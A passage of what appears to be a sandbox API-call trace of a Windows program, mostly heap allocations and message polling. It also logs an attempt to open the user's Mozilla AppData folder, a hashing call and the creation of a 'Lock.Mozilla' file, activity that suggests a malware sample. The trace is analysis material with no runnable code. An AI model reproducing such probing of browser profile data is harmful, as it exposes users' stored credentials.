(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7140, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0174.643] CryptDestroyHash (hHash=0x9e2238) returned 1 [0174.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Mozilla" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\mozilla"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.644] GetLastError () returned 0x5 [0174.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0174.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0174.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0174.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0174.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0174.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0174.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.645] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0174.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0174.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0174.645] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Mozilla" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.mozilla"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0174.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0174.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0174.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0174.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0174.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0174.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0174.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0174.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0174.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0174.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0174.649] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0174.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0174.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0174.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0174.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0174.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0174.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0174.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0174.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0174.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0174.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0174.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0174.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0174.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0174.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa870 [0174.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0174.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0174.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0174.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0174.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0174.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0174.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0174.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0174.653] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0174.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0174.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0174.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0174.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0174.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0174.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0174.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0174.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0174.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0174.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0174.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.654] 